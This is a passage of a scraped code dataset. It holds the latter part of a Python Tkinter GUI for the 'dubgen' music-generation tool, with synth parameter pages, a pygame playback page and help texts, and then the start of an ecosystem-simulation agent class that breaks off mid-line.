columnspan=2, sticky = 'SW', padx=20)\n \n info3 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_LFO\"))\n info3.grid(row=row, column=1, sticky = 'S')\n \n lfo_floor_slider.grid(row=row, column=2, columnspan=2)\n \n lfo_floor_min = tk.Label(self, text = str(self.min_lfo_floor),\n font=('Helvetica', \"10\"))\n lfo_floor_min.grid(row=row, column=1, sticky = 'SE')\n \n lfo_floor_max = tk.Label(self, text=str(self.max_lfo_floor)+ \" Hz\",\n font=('Helvetica', \"10\"))\n lfo_floor_max.grid(row=row, column=4, sticky = 'SW')\n row+=1\n \n ## LFO CEILING ##########################\n \n label_lfo_ceiling = tk.Label(self, text='LFO Maximum', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_lfo_ceiling.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info4 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_LFO\"))\n info4.grid(row=row, column=1, sticky = 'S')\n \n lfo_ceiling_slider.grid(row=row, column=2, columnspan=2)\n \n lfo_ceiling_min = tk.Label(self, text = str(self.min_lfo_ceiling),\n font=('Helvetica', \"10\"))\n lfo_ceiling_min.grid(row=row, column=1, sticky = 'SE')\n \n lfo_ceiling_max = tk.Label(self, text=str(self.max_lfo_ceiling) + \" Hz\",\n font=('Helvetica', \"10\"))\n lfo_ceiling_max.grid(row=row, column=4, sticky = 'SW')\n row+=1\n \n ########### lfo shape & lfo evo ##########\n \n label_lfo_shape = tk.Label(self, text='LFO Shape & EVO', font=(\"Helvetica\", \"11\"),\n justify=\"left\")\n label_lfo_shape.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20, pady=10)\n \n info5 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_LFO_SHAPE_EVO\"))\n info5.grid(row=row, column=1, sticky = 'S', pady=10)\n \n menu_lfo_shape.grid(row=row, column=2, sticky='S', pady=10) \n menu_lfo_evo.grid(row=row, column=3, sticky='SW', pady=10)\n \n high_pass_checkbox.grid(row=row, column=3, sticky='SE', pady=10)\n row+=1\n \n go_back = tk.Button(self, text=\"Save Parameters\", font=('Helvetica', 14),\n command= combine_funcs(self.save_params, lambda: controller.show_frame(\"PageSix\")))\n go_back.grid(row=row, column=4, pady=20, columnspan=2, sticky='S', padx=20)\n row+=1\n \n \n def save_params(self):\n #normalizar\n cutoff_floor = (self.cutoff_floor.get() - self.min_cutoff_floor) / (self.max_cutoff_floor - self.min_cutoff_floor)\n cutoff_ceiling = (self.cutoff_ceiling.get() - self.min_cutoff_ceiling) / (self.max_cutoff_ceiling - self.min_cutoff_ceiling)\n lfo_floor = (self.lfo_floor.get() - self.min_lfo_floor) / (self.max_lfo_floor - self.min_lfo_floor)\n lfo_ceiling = (self.lfo_ceiling.get() - self.min_lfo_ceiling) / (self.max_lfo_ceiling - self.min_lfo_ceiling) \n \n \n af_param = [[float(cutoff_floor), float(cutoff_ceiling), float(lfo_floor),\n float(lfo_ceiling), str(self.lfo_shape.get()), str(self.lfo_evo.get()), bool(self.high_pass.get())]]\n af_param *= self.controller.frames['PageSix'].max_sections\n \n \n self.controller.frames['PageSix'].af_param = af_param\n \n \nclass PageEight(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(7):\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n label6 = tk.Label(self, text=\" \")\n label6.grid(row=0, column=5)\n \n label7 = tk.Label(self, text=\" \")\n label7.grid(row=0, column=6)\n \n row = 1\n \n slider_length = 350\n \n label = tk.Label(self, text=\"Granular\", font=controller.title_font)\n label.grid(row=row, column=2 , columnspan=3, pady=20, sticky=\"nsew\")\n row+=1\n \n ############################## init variables ##########################\n \n self.grain_size = tk.DoubleVar()\n self.grain_space = tk.DoubleVar()\n self.order = tk.BooleanVar()\n self.smoothing = tk.BooleanVar()\n self.sync = tk.BooleanVar()\n \n self.grain_size.set(0.005) \n self.grain_space.set(0.005) \n \n self.min_grain_size = 0.001\n self.max_grain_size = 0.01\n self.min_grain_space = 0.001\n self.max_grain_space = 0.01\n \n def set_grain_size(self, value):\n self.grain_size.set(float(value))\n def set_grain_space(self, value):\n self.grain_space.set(float(value))\n def set_order(self, value):\n self.order.set(bool(value))\n def set_smoothing(self, value):\n self.smoothing.set(bool(value))\n def set_sync(self, value):\n self.sync.set(bool(value))\n \n ##################################### grain size ############################\n \n label_grain_size = tk.Label(self, text='Grain Size', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_grain_size.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info1 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_GRAIN_SIZE\"))\n info1.grid(row=row, column=1, sticky = 'SE')\n \n grain_size_slider = tk.Scale(self, variable=self.grain_size, from_= self.min_grain_size,\n to=self.max_grain_size, resolution=0.001, length= slider_length,\n orient = 'horizontal', command= lambda value: set_grain_size(self, value))\n \n grain_size_slider.grid(row=row, column=3, columnspan=3)\n \n grain_size_min = tk.Label(self, text = str(self.min_grain_size),\n font=('Helvetica', \"10\"))\n grain_size_min.grid(row=row, column=2, sticky = 'SE')\n \n grain_size_max = tk.Label(self, text=str(self.max_grain_size) + \" s\",\n font=('Helvetica', \"10\"))\n grain_size_max.grid(row=row, column=6, sticky = 'SW')\n \n row+=1\n \n ################################### grain_space ##############################\n \n label_grain_space = tk.Label(self, text='Grain Space', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_grain_space.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info2 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_GRAIN_SPACE\"))\n info2.grid(row=row, column=1, sticky = 'SE')\n \n grain_space_slider = tk.Scale(self, variable=self.grain_space, from_=self.min_grain_space,\n to=self.max_grain_space, resolution=0.001, length= slider_length,\n orient = 'horizontal', command= lambda value: set_grain_space(self, value))\n \n grain_space_slider.grid(row=row, column=3, columnspan=3)\n \n grain_space_min = tk.Label(self, text = str(self.min_grain_space),\n font=('Helvetica', \"10\"))\n grain_space_min.grid(row=row, column=2, sticky = 'SE')\n \n grain_space_max = tk.Label(self, text=str(self.max_grain_space) + \" s\",\n font=('Helvetica', \"10\"))\n grain_space_max.grid(row=row, column=6, sticky = 'SW')\n\n row+=1\n \n ########################## checkboxes #########################################\n check_size=10\n \n ### order\n label_grain_order = tk.Label(self, text='Grain Order', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_grain_order.grid(row=row, column=0, columnspan=2, sticky = 'W', padx=20)\n \n info3 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_GRAIN_ORDER\"))\n info3.grid(row=row, column=1, sticky = 'SE', pady=15)\n \n \n order_checkbox = tk.Checkbutton(self, variable=self.order,\n command= lambda value: set_order(self, value))\n \n order_checkbox.grid(row=row, column=1, sticky = 'S', pady = 15)\n \n \n ### smoothing\n \n label_smoothing = tk.Label(self, text='Smoothing', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_smoothing.grid(row=row, column=2, columnspan=2, sticky = 'W', padx=20)\n \n info4 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_SMOOTHING\"))\n info4.grid(row=row, column=3, sticky = 'SE', pady=15)\n \n \n smoothing_checkbox = tk.Checkbutton(self, variable=self.smoothing,\n command= lambda value: set_smoothing(self, value))\n \n smoothing_checkbox.grid(row=row, column=3, sticky = 'S', pady = 15)\n \n \n ### even spacing\n \n label_spacing = tk.Label(self, text='Even Spacing', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_spacing.grid(row=row, column=4, columnspan=2, sticky = 'nsew', padx=10)\n \n info4 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_EVEN_SPACING\"))\n info4.grid(row=row, column=5, sticky = 'SE', pady=15)\n \n \n sync_checkbox = tk.Checkbutton(self, variable=self.sync, \n command= lambda value: set_sync(self, value))\n \n sync_checkbox.grid(row=row, column=5, sticky = 'S', pady = 15)\n \n row+=1\n \n go_back = tk.Button(self, text=\"Save Parameters\", font=('Helvetica', 14),\n command= combine_funcs(self.save_params, lambda: controller.show_frame(\"PageSix\")))\n go_back.grid(row=row, column=5, pady=20, columnspan=2, sticky='S')\n \n \n def save_params(self):\n #normalize (0 to 1)\n grain_size = (self.grain_size.get() - self.min_grain_size) / (self.max_grain_size - self.min_grain_size)\n grain_space = (self.grain_space.get() - self.min_grain_space) / (self.max_grain_space - self.min_grain_space)\n \n gr_param = [[float(grain_size), float(grain_space), bool(self.order.get()),\n bool(self.smoothing.get()), bool(self.sync.get())]]\n gr_param *= self.controller.frames['PageSix'].max_sections\n \n self.controller.frames['PageSix'].gr_param = gr_param\n\nclass PageNine(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(7):\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n label6 = tk.Label(self, text=\" \")\n label6.grid(row=0, column=5)\n \n label7 = tk.Label(self, text=\" \")\n label7.grid(row=0, column=6)\n \n row = 1\n \n label = tk.Label(self, text=\"Interpolator\", font=controller.title_font)\n label.grid(row=row, column=2, columnspan=3, pady=20, sticky=\"nsew\")\n row+=1\n \n \n self.signal_shape = tk.StringVar(value=\"sine\")\n self.signal_evo = tk.StringVar(value=\"random\")\n \n def set_signal_shape(self, value):\n self.signal_shape.set(str(value))\n def set_signal_evo(self, value):\n self.signal_evo.set(str(value))\n\n shapes = ['sine', 'square', 'triangle', 'sawl', 'sawr']\n evos = ['constant', 'linear_up', 'linear_down', 'exp_up', 'exp_down', 'random']\n \n menu_signal_shape = tk.OptionMenu(self, self.signal_shape, *shapes,\n command= lambda value: set_signal_shape(self, value))\n menu_signal_evo = tk.OptionMenu(self, self.signal_evo, *evos,\n command= lambda value: set_signal_evo(self, value))\n\n\n label_signal = tk.Label(self, text='Signal Shape & \"EVO\"', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_signal.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20, pady=10)\n \n info1 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_SIGNAL_SHAPE_EVO\"))\n info1.grid(row=row, column=2, sticky = 'SW', pady=10)\n \n menu_signal_shape.grid(row=row, column=3, sticky='S', pady=10) \n menu_signal_evo.grid(row=row, column=4, sticky='SW', pady=10) \n \n row+=1\n \n go_back = tk.Button(self, text=\"Save Parameters\", font=('Helvetica', 14),\n command= combine_funcs(self.save_params, lambda: controller.show_frame(\"PageSix\")))\n go_back.grid(row=row, column=5, pady=20, columnspan=2, sticky='S')\n \n \n \n def save_params(self):\n ip_param = [[str(self.signal_shape.get()), str(self.signal_evo.get())]]\n ip_param *= self.controller.frames['PageSix'].max_sections\n \n self.controller.frames['PageSix'].ip_param = ip_param \n \n \nclass PageTen(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(7):\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n label6 = tk.Label(self, text=\" \")\n label6.grid(row=0, column=5)\n \n label7 = tk.Label(self, text=\" \")\n label7.grid(row=0, column=6)\n \n row=1\n \n label = tk.Label(self, text=\"Final Arrangement\\n(with Synth)\", font=controller.title_font)\n label.grid(row=row, column=0, columnspan=7, pady=10)\n row+=1\n \n main_path = self.controller.shared_data[\"main_path\"]\n \n #create playlist mixer\n self.mixer = pygame.mixer\n self.mixer.init()\n\n\n ###################################### icons ####################################\n #icon_path = main_path + '/GUI/icons/'\n icon_path = main_path + '/icons/'\n \n play_img = Image.open(icon_path + 'play.png')\n pause_img = Image.open( icon_path + 'pause.png')\n stop_img = Image.open( icon_path + 'stop.png')\n backward_img = Image.open( icon_path + 'backward.png')\n forward_img = Image.open( icon_path + 'forward.png')\n \n play_img = play_img.resize((20, 20))\n pause_img = pause_img.resize((20, 20))\n stop_img = stop_img.resize((20, 20))\n backward_img = backward_img.resize((20, 20))\n forward_img = forward_img.resize((20, 20))\n \n play_icon = ImageTk.PhotoImage(image = play_img, master = controller)\n pause_icon = ImageTk.PhotoImage(image = pause_img, master = controller)\n stop_icon = ImageTk.PhotoImage(image = stop_img, master = controller)\n backward_icon = ImageTk.PhotoImage(image = backward_img, master = controller)\n forward_icon = ImageTk.PhotoImage(image = forward_img, master = controller)\n \n ########################################## mp3 #######################################\n mp3_frame = tk.Frame(self, padx=10, pady=10,\n highlightbackground=\"black\", highlightthickness=1)\n mp3_frame.grid(row=row, column=1, columnspan=5, pady=10, sticky='nsew')\n \n for i in range(5):\n mp3_frame.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n pady_mp3 = 20\n \n self.paused = False\n self.save_start = 0\n \n play_btn = tk.Button(mp3_frame, image=play_icon, borderwidth=0, command= self.Play_Song)\n pause_btn = tk.Button(mp3_frame, image=pause_icon, borderwidth=0, command= self.Pause_Song)\n stop_btn = tk.Button(mp3_frame, image=stop_icon, borderwidth=0, command= self.Stop_Song)\n backward_btn = tk.Button(mp3_frame, image=backward_icon, borderwidth=0, command= self.Backward_Song)\n forward_btn = tk.Button(mp3_frame, image=forward_icon, borderwidth=0, command= self.Forward_Song)\n \n play_btn.image = play_icon\n pause_btn.image = pause_icon\n stop_btn.image = stop_icon\n backward_btn.image = backward_icon\n forward_btn.image = forward_icon\n \n backward_btn.grid(row = row, column = 0, pady=pady_mp3, sticky='nsew')\n stop_btn.grid(row = row, column = 1, pady=pady_mp3, sticky='nsew')\n play_btn.grid(row = row, column = 2, pady=pady_mp3, sticky='nsew')\n pause_btn.grid(row = row, column = 3, pady=pady_mp3, sticky='nsew')\n forward_btn.grid(row = row, column = 4, pady=pady_mp3, sticky='nsew')\n \n row+=1\n \n ######################################## volume #######################################\n \n def set_volume(val):\n volume = float(val) / 100\n self.mixer.music.set_volume(volume)\n \n label_vol = tk.Label(mp3_frame, text=\"Volume\", font=('Helvetica', 16))\n label_vol.grid(row=row, column=0, columnspan=5, sticky='s')\n row+=1\n \n vol_slider = tk.Scale(mp3_frame, from_=0, to=100, orient='horizontal', command= set_volume,\n length= 300)\n vol_slider.set(50)\n vol_slider.grid(row = row, column=1, columnspan=3)#, pady=10)\n row+=1\n \n ######################################################################################\n \n def close_window():\n pygame.mixer.quit()\n self.controller.destroy()\n \n close_button = tk.Button(self, text=\"Close\", font=('Helvetica', 18),\n command=close_window)\n close_button.grid(row = row, column=3, columnspan=1, pady=50)\n row+=1\n \n def Play_Song(self):\n song_path = self.controller.frames['PageSix'].out_synth_path\n \n self.mixer.music.load(song_path)\n self.mixer.music.play(loops=0)\n \n def Stop_Song(self):\n self.mixer.music.stop()\n \n self.start=0\n \n \n def Pause_Song(self):\n \n if self.paused:\n #unpause \n self.mixer.music.unpause()\n self.paused = False\n else:\n #pause\n self.mixer.music.pause()\n self.paused = True\n \n \n def Forward_Song(self):\n \n start = self.save_start\n \n play_time = self.mixer.music.get_pos()\n\n start += (play_time/1000.0) + 5\n \n self.mixer.music.pause()\n \n self.save_start = start\n #print('Current Time in Song:', start)\n \n self.mixer.music.play(loops=0, start = start)\n \n def Backward_Song(self):\n start = self.save_start\n \n play_time = self.mixer.music.get_pos()\n\n start += (play_time/1000.0) - 5\n \n self.mixer.music.pause()\n \n self.save_start = start\n #print('Current Time in Song:', start)\n \n self.mixer.music.play(loops=0, start = start)\n \n def set_volume(self):\n volume = float(self.vol) / 100\n self.mixer.music.set_volume(volume)\n \n\nclass INFO_MOD_LEVEL(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Mod Level:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Mod level']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageTwo\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_MOD_FEEDBACK(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Mod Feedback:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Mod Feedback']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageTwo\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_SECTION_SIZE(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Section Size:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Section Size']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageTwo\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_CUSTOMIZE_PARAMETERS(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Customize Parameters:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Customize Parameters']\n info = tk.Label(self, text=text,\n font=('Helvetica', 12), wraplength=500)\n info.pack(expand=True, padx=20)\n \n text = GUI_txt['Auto Filter']\n info = tk.Label(self, text=text,\n font=('Helvetica', 12), wraplength=500)\n info.pack(expand=True, padx=20)\n \n text = GUI_txt['Granular']\n info = tk.Label(self, text=text,\n font=('Helvetica', 12), wraplength=500)\n info.pack(expand=True, padx=20)\n \n text = GUI_txt['Interpolator']\n info = tk.Label(self, text=text,\n font=('Helvetica', 12), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageSix\"))\n button.pack(expand=True, padx=20)\n \n \n \nclass INFO_CUTOFF(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Minimum and Maximum Cutoff:\",\n font=controller.title_font, wraplength=500)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Cutoff']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageSeven\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_LFO(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Minimum and Maximum LFO Frequency:\",\n font=controller.title_font, wraplength=500)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['LFO']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageSeven\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_LFO_SHAPE_EVO(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"LFO Shape & EVO:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['LFO SHAPE EVO']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n text1 = GUI_txt['SHAPE LEGEND']\n info1 = tk.Label(self, text=text1,\n font=('Helvetica', 12), wraplength=500)\n info1.pack(expand=True, padx=20)\n \n text2 = GUI_txt['EVO LEGEND']\n info2 = tk.Label(self, text=text2,\n font=('Helvetica', 12), wraplength=500)\n info2.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageSeven\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_GRAIN_SIZE(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Grain Size:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Grain Size']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_GRAIN_SPACE(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Grain Space:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Grain Space']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_GRAIN_ORDER(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Grain Order:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Grain Order']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_SMOOTHING(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Smoothing:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Smoothing']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_EVEN_SPACING(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Even Spacing:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Even Spacing']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_SIGNAL_SHAPE_EVO(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Wavetable Shaepe & EVO:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['SIGNAL SHAPE EVO']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageNine\"))\n button.pack(expand=True, padx=20)\n \n\n \ndef get_GUI_TEXT():\n\n GUI_txt = dict()\n \n GUI_txt['Mod level'] = 'Maximum Probability of MIDI Modification Ocurrence.\\\n The bigger the value, the more likely to occur Modifications.'\n \n GUI_txt['Mod Feedback'] = 'Number of times the MIDI pattern gets processed by the MIDI Modification Unit.\\\n A higher number of times will overlay MIDI Mod effects on top of each other.'\n \n GUI_txt['Section Size'] = 'Number of bars of a single \"section\" of the arrangement.\\\n This determines the number of samples used: for each instrument there is one sample per section.'\n \n GUI_txt['Customize Parameters'] = 'There are three Synth modules: Auto-Filter, Granular and Interpolator.\\\n Each Unit is assigned to one Instrument. If you choose the \"Customize Parameters\" option, you can pick which instruments has each Synth Unit, and customize the Synths Parameters. \\\n Otherwise, dubgen will pick the parameters for you and assign each Synth Unit.'\n \n GUI_txt['Auto Filter'] ='Auto-Filter: Applies a Low/High Pass Filter, with a cutoff frequency modulated by an LFO.'\n GUI_txt['Granular'] ='Granular: Divides the signal into small segments (grains), creating new sounds by reordering, spacing out, or \"condensing\" those grains.'\n GUI_txt['Interpolator'] ='Interpolator: Interpolates the input signal with another signal stored in our wavetable.'\n \n \n GUI_txt['Cutoff'] = 'Determines the Maximum and Minimum Cutoff Frequency of the Auto Filter.\\\n The Cutoff Frequency will then oscillate between those two values, modulated by the LFO.'\n \n GUI_txt['LFO'] = 'Determines the Maximum and Minimum LFO Frequency of the Auto Filter. \\\n This will determine the rate at which the Cutoff Frequency oscillates between its Minimum and Maximum Value.'\n \n GUI_txt['LFO SHAPE EVO'] = 'Shape: Shape of the LFO signal. \\\n EVO: Function that determines the evolution of the LFO frequency.'\n \n GUI_txt['SHAPE LEGEND'] = 'SHAPE legend:\\n sawl/sawr: sawtooth wave with a left (l) or right (r) \"teeth\".'\n \n GUI_txt['EVO LEGEND'] = 'EVO Legend:\\n linear_up/down: crescent or decrescent linear function;\\n \\\n exp_up/down: Exponetinal crescent or decrescent function.\\n'\n \n GUI_txt['Grain Size'] = 'Size of each grain.'\n GUI_txt['Grain Space'] ='Space between each grain.'\n GUI_txt['Grain Order'] ='True means the grains maintain original order.\\\n False means the grains are reordered.'\n GUI_txt['Smoothing'] = 'Smoothing Filter smoothens transition between grains.'\n GUI_txt['Even Spacing'] ='True means spaces between grains are all the same.\\\n False means the space between grains varies randomly.'\n \n GUI_txt['SIGNAL SHAPE EVO'] = 'Determines the shape of the wavetable sound that will be interpolated with the input signal. EVO determines the evolution of the balance (interpolation weight from 0 to 1) between the two sounds.'\n \n return GUI_txt\n \nif __name__ == \"__main__\":\n \n warnings.filterwarnings(\"ignore\")\n \n GUI_txt = get_GUI_TEXT()\n \n pygame.mixer.quit()\n \n app = App()\n \n app.lift()\n app.attributes('-topmost', True)\n app.after_idle(app.attributes,'-topmost', False)\n \n app.mainloop()\n","repo_name":"JPPaixao/dubgen","sub_path":"Program/dubgen.py","file_name":"dubgen.py","file_ext":"py","file_size_in_byte":83458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2016670694","text":"import random\n\nimport pygame.time\nfrom pygame import Vector2\nimport itertools\n\nimport core\nfrom body import Body\nfrom vegetal import Vegetal\n\n\nclass Agent(object):\n def __init__(self, statut, position, vmin, vmax, accmin, accmax, faim_min, faim_max, fatigue_min, fatigue_max,\n reproduction_min, reproduction_max, endormi_min, endormi_max, esperance_min, esperance_max):\n self.body = Body(self, statut, position, vmin, vmax, accmin, accmax, faim_min, faim_max, fatigue_min,\n fatigue_max, reproduction_min, reproduction_max, endormi_min, endormi_max, esperance_min,\n esperance_max)\n self.uuid = random.randint(100000, 999999999)\n\n def filtrePerception(self):\n carnivore = []\n super_predateur = []\n herbivore = []\n decompositeur = []\n vegetal = []\n for i in self.body.fustrum.perceptionList:\n i.dist = self.body.position.distance_to(i.position)\n if isinstance(i, Vegetal):\n vegetal.append(i)\n if isinstance(i, Body):\n if i.statut == \"CARNIVORE\":\n carnivore.append(i)\n elif i.statut == \"HERBIVORE\":\n herbivore.append(i)\n elif i.statut == \"SUPER_PREDATEUR\":\n super_predateur.append(i)\n elif i.statut 